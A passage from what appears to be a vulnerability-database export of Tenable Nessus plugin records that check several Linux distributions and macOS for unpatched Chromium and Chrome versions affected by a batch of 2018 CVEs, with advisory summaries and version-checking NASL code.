script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-67.0.3396.62-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-debuginfo-67.0.3396.62-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-67.0.3396.62-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debuginfo-67.0.3396.62-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debugsource-67.0.3396.62-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromedriver-67.0.3396.62-161.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromedriver-debuginfo-67.0.3396.62-161.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-67.0.3396.62-161.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-debuginfo-67.0.3396.62-161.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-debugsource-67.0.3396.62-161.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:40:03", "bulletinFamily": "scanner", "description": "The version of Google Chrome installed on the remote host is prior to 67.0.3396.62. It is, therefore, affected by multiple unspecified vulnerabilities as noted in Chrome stable channel update release notes for May 29th, 2018. Please refer to the release notes for additional information.\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "modified": "2018-07-27T00:00:00", "id": "MACOSX_GOOGLE_CHROME_67_0_3396_62.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110229", "published": "2018-05-31T00:00:00", "title": "Google Chrome < 67.0.3396.62 Multiple Vulnerabilities (macOS)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110229);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/07/27 14:20:40\");\n\n script_cve_id(\n \"CVE-2018-6123\",\n \"CVE-2018-6124\",\n \"CVE-2018-6125\",\n \"CVE-2018-6126\",\n \"CVE-2018-6127\",\n \"CVE-2018-6128\",\n \"CVE-2018-6129\",\n \"CVE-2018-6130\",\n \"CVE-2018-6131\",\n \"CVE-2018-6132\",\n \"CVE-2018-6133\",\n \"CVE-2018-6134\",\n \"CVE-2018-6135\",\n \"CVE-2018-6136\",\n \"CVE-2018-6137\",\n \"CVE-2018-6138\",\n \"CVE-2018-6139\",\n \"CVE-2018-6140\",\n \"CVE-2018-6141\",\n \"CVE-2018-6142\",\n \"CVE-2018-6143\",\n \"CVE-2018-6144\",\n \"CVE-2018-6145\",\n \"CVE-2018-6147\"\n );\n script_bugtraq_id(104309);\n\n script_name(english:\"Google Chrome < 67.0.3396.62 Multiple Vulnerabilities (macOS)\");\n script_summary(english:\"Checks the version of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote host is prior\nto 67.0.3396.62. It is, therefore, affected by multiple unspecified\nvulnerabilities as noted in Chrome stable channel update release notes\nfor May 29th, 2018. Please refer to the release notes for additional\ninformation.\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2018/05/stable-channel-update-for-desktop_58.html\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?e0ac93e8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 67.0.3396.62 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/31\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"local\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'67.0.3396.62', severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:40:31", "bulletinFamily": "scanner", "description": "Update to Chromium 67. Security fix for CVE-2018-6123 CVE-2018-6124 CVE-2018-6125 CVE-2018-6126 CVE-2018-6127 CVE-2018-6128 CVE-2018-6129 CVE-2018-6130 CVE-2018-6131 CVE-2018-6132 CVE-2018-6133 CVE-2018-6134 CVE-2018-6135 CVE-2018-6136 CVE-2018-6137 CVE-2018-6148\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-01-31T00:00:00", "id": "FEDORA_2018-09B59B0227.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110625", "published": "2018-06-21T00:00:00", "title": "Fedora 27 : chromium (2018-09b59b0227)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-09b59b0227.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110625);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/01/31 9:35:42\");\n\n script_cve_id(\"CVE-2018-6123\", \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\", \"CVE-2018-6127\", \"CVE-2018-6128\", \"CVE-2018-6129\", \"CVE-2018-6130\", \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\", \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6138\", \"CVE-2018-6139\", \"CVE-2018-6140\", \"CVE-2018-6141\", \"CVE-2018-6142\", \"CVE-2018-6143\", \"CVE-2018-6144\", \"CVE-2018-6145\", \"CVE-2018-6147\", \"CVE-2018-6148\");\n script_xref(name:\"FEDORA\", value:\"2018-09b59b0227\");\n\n script_name(english:\"Fedora 27 : chromium (2018-09b59b0227)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to Chromium 67. Security fix for CVE-2018-6123 CVE-2018-6124\nCVE-2018-6125 CVE-2018-6126 CVE-2018-6127 CVE-2018-6128 CVE-2018-6129\nCVE-2018-6130 CVE-2018-6131 CVE-2018-6132 CVE-2018-6133 CVE-2018-6134\nCVE-2018-6135 CVE-2018-6136 CVE-2018-6137 CVE-2018-6148\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-09b59b0227\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"chromium-67.0.3396.79-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:40:18", "bulletinFamily": "scanner", "description": "An update for chromium-browser is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 67.0.3396.62.\n\nSecurity Fix(es) :\n\n* chromium-browser: Use after free in Blink (CVE-2018-6123)\n\n* chromium-browser: Type confusion in Blink (CVE-2018-6124)\n\n* chromium-browser: Overly permissive policy in WebUSB (CVE-2018-6125)\n\n* chromium-browser: Heap buffer overflow in Skia (CVE-2018-6126)\n\n* chromium-browser: Use after free in indexedDB (CVE-2018-6127)\n\n* chromium-browser: Out of bounds memory access in WebRTC (CVE-2018-6129)\n\n* chromium-browser: Out of bounds memory access in WebRTC (CVE-2018-6130)\n\n* chromium-browser: Incorrect mutability protection in WebAssembly (CVE-2018-6131)\n\n* chromium-browser: Use of uninitialized memory in WebRTC (CVE-2018-6132)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-6133)\n\n* chromium-browser: Referrer Policy bypass in Blink (CVE-2018-6134)\n\n* chromium-browser: UI spoofing in Blink (CVE-2018-6135)\n\n* chromium-browser: Out of bounds memory access in V8 (CVE-2018-6136)\n\n* chromium-browser: Leak of visited status of page in Blink (CVE-2018-6137)\n\n* chromium-browser: Overly permissive policy in Extensions (CVE-2018-6138)\n\n* chromium-browser: Restrictions bypass in the debugger extension API (CVE-2018-6139)\n\n* chromium-browser: Restrictions bypass in the debugger extension API (CVE-2018-6140)\n\n* chromium-browser: Heap buffer overflow in Skia (CVE-2018-6141)\n\n* chromium-browser: Out of bounds memory access in V8 (CVE-2018-6142)\n\n* chromium-browser: Out of bounds memory access in V8 (CVE-2018-6143)\n\n* chromium-browser: Out of bounds memory access in PDFium (CVE-2018-6144)\n\n* chromium-browser: Incorrect escaping of MathML in Blink (CVE-2018-6145)\n\n* chromium-browser: Password fields not taking advantage of OS protections in Views (CVE-2018-6147)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-01-31T00:00:00", "id": "REDHAT-RHSA-2018-1815.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110406", "published": "2018-06-08T00:00:00", "title": "RHEL 6 : chromium-browser (RHSA-2018:1815)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:1815. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110406);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/01/31 9:35:42\");\n\n script_cve_id(\"CVE-2018-6123\", \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\", \"CVE-2018-6127\", \"CVE-2018-6129\", \"CVE-2018-6130\", \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\", \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6138\", \"CVE-2018-6139\", \"CVE-2018-6140\", \"CVE-2018-6141\", \"CVE-2018-6142\", \"CVE-2018-6143\", \"CVE-2018-6144\", \"CVE-2018-6145\", \"CVE-2018-6147\");\n script_xref(name:\"RHSA\", value:\"2018:1815\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2018:1815)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 67.0.3396.62.\n\nSecurity Fix(es) :\n\n* chromium-browser: Use after free in Blink (CVE-2018-6123)\n\n* chromium-browser: Type confusion in Blink (CVE-2018-6124)\n\n* chromium-browser: Overly permissive policy in WebUSB (CVE-2018-6125)\n\n* chromium-browser: Heap buffer overflow in Skia (CVE-2018-6126)\n\n* chromium-browser: Use after free in indexedDB (CVE-2018-6127)\n\n* chromium-browser: Out of bounds memory access in WebRTC\n(CVE-2018-6129)\n\n* chromium-browser: Out of bounds memory access in WebRTC\n(CVE-2018-6130)\n\n* chromium-browser: Incorrect mutability protection in WebAssembly\n(CVE-2018-6131)\n\n* chromium-browser: Use of uninitialized memory in WebRTC\n(CVE-2018-6132)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-6133)\n\n* chromium-browser: Referrer Policy bypass in Blink (CVE-2018-6134)\n\n* chromium-browser: UI spoofing in Blink (CVE-2018-6135)\n\n* chromium-browser: Out of bounds memory access in V8 (CVE-2018-6136)\n\n* chromium-browser: Leak of visited status of page in Blink\n(CVE-2018-6137)\n\n* chromium-browser: Overly permissive policy in Extensions\n(CVE-2018-6138)\n\n* chromium-browser: Restrictions bypass in the debugger extension API\n(CVE-2018-6139)\n\n* chromium-browser: Restrictions bypass in the debugger extension API\n(CVE-2018-6140)\n\n* chromium-browser: Heap buffer overflow in Skia (CVE-2018-6141)\n\n* chromium-browser: Out of bounds memory access in V8 (CVE-2018-6142)\n\n* chromium-browser: Out of bounds memory access in V8 (CVE-2018-6143)\n\n* chromium-browser: Out of bounds memory access in PDFium\n(CVE-2018-6144)\n\n* chromium-browser: Incorrect escaping of MathML in Blink\n(CVE-2018-6145)\n\n* chromium-browser: Password fields not taking advantage of OS\nprotections in Views (CVE-2018-6147)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:1815\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6123\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6124\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6127\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6129\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6130\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6131\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6132\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6133\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6134\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6135\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6136\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6137\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6138\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6139\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6140\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6141\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6142\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6143\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6144\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6145\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-6147\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:1815\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-67.0.3396.62-2.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-67.0.3396.62-2.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-67.0.3396.62-2.el6_9\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-67.0.3396.62-2.el6_9\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:40:43", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\n - CVE-2018-6118 Ned Williamson discovered a use-after-free issue.\n\n - CVE-2018-6120 Zhou Aiting discovered a buffer overflow issue in the pdfium library.\n\n - CVE-2018-6121 It was discovered that malicious extensions could escalate privileges.\n\n - CVE-2018-6122 A type confusion issue was discovered in the v8 JavaScript library.\n\n - CVE-2018-6123 Looben Yang discovered a use-after-free issue.\n\n - CVE-2018-6124 Guang Gong discovered a type confusion issue.\n\n - CVE-2018-6125 Yubico discovered that the WebUSB implementation was too permissive.\n\n - CVE-2018-6126 Ivan Fratric discovered a buffer overflow issue in the skia library.\n\n - CVE-2018-6127 Looben Yang discovered a use-after-free issue.\n\n - CVE-2018-6129 Natalie Silvanovich discovered an out-of-bounds read issue in WebRTC.\n\n - CVE-2018-6130 Natalie Silvanovich discovered an out-of-bounds read issue in WebRTC.\n\n - CVE-2018-6131 Natalie Silvanovich discovered an error in WebAssembly.\n\n - CVE-2018-6132 Ronald E. Crane discovered an uninitialized memory issue.\n\n - CVE-2018-6133 Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2018-6134 Jun Kokatsu discovered a way to bypass the Referrer Policy.\n\n - CVE-2018-6135 Jasper Rebane discovered a user interface spoofing issue.\n\n - CVE-2018-6136 Peter Wong discovered an out-of-bounds read issue in the v8 JavaScript library.\n\n - CVE-2018-6137 Michael Smith discovered an information leak.\n\n - CVE-2018-6138 Francois Lajeunesse-Robert discovered that the extensions policy was too permissive.\n\n - CVE-2018-6139 Rob Wu discovered a way to bypass restrictions in the debugger extension.\n\n - CVE-2018-6140 Rob Wu discovered a way to bypass restrictions in the debugger extension.\n\n - CVE-2018-6141 Yangkang discovered a buffer overflow issue in the skia library.\n\n - CVE-2018-6142 Choongwoo Han discovered an out-of-bounds read in the v8 JavaScript library.\n\n - CVE-2018-6143 Guang Gong discovered an out-of-bounds read in the v8 JavaScript library.\n\n - CVE-2018-6144 pdknsk discovered an out-of-bounds read in the pdfium library.\n\n - CVE-2018-6145 Masato Kinugawa discovered an error in the MathML implementation.\n\n - CVE-2018-6147 Michail Pishchagin discovered an error in password entry fields.\n\n - CVE-2018-6148 Michal Bentkowski discovered that the Content Security Policy header was handled incorrectly.\n\n - CVE-2018-6149 Yu Zhou and Jundong Xie discovered an out-of-bounds write issue in the v8 JavaScript library.", "modified": "2019-01-31T00:00:00", "id": "DEBIAN_DSA-4237.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110820", "published": "2018-07-02T00:00:00", "title": "Debian DSA-4237-1 : chromium-browser - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4237. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110820);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/01/31 9:35:42\");\n\n script_cve_id(\"CVE-2018-6118\", \"CVE-2018-6120\", \"CVE-2018-6121\", \"CVE-2018-6122\", \"CVE-2018-6123\", \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\", \"CVE-2018-6127\", \"CVE-2018-6129\", \"CVE-2018-6130\", \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\", \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6138\", \"CVE-2018-6139\", \"CVE-2018-6140\", \"CVE-2018-6141\", \"CVE-2018-6142\", \"CVE-2018-6143\", \"CVE-2018-6144\", \"CVE-2018-6145\", \"CVE-2018-6147\", \"CVE-2018-6148\", \"CVE-2018-6149\");\n script_xref(name:\"DSA\", value:\"4237\");\n\n script_name(english:\"Debian 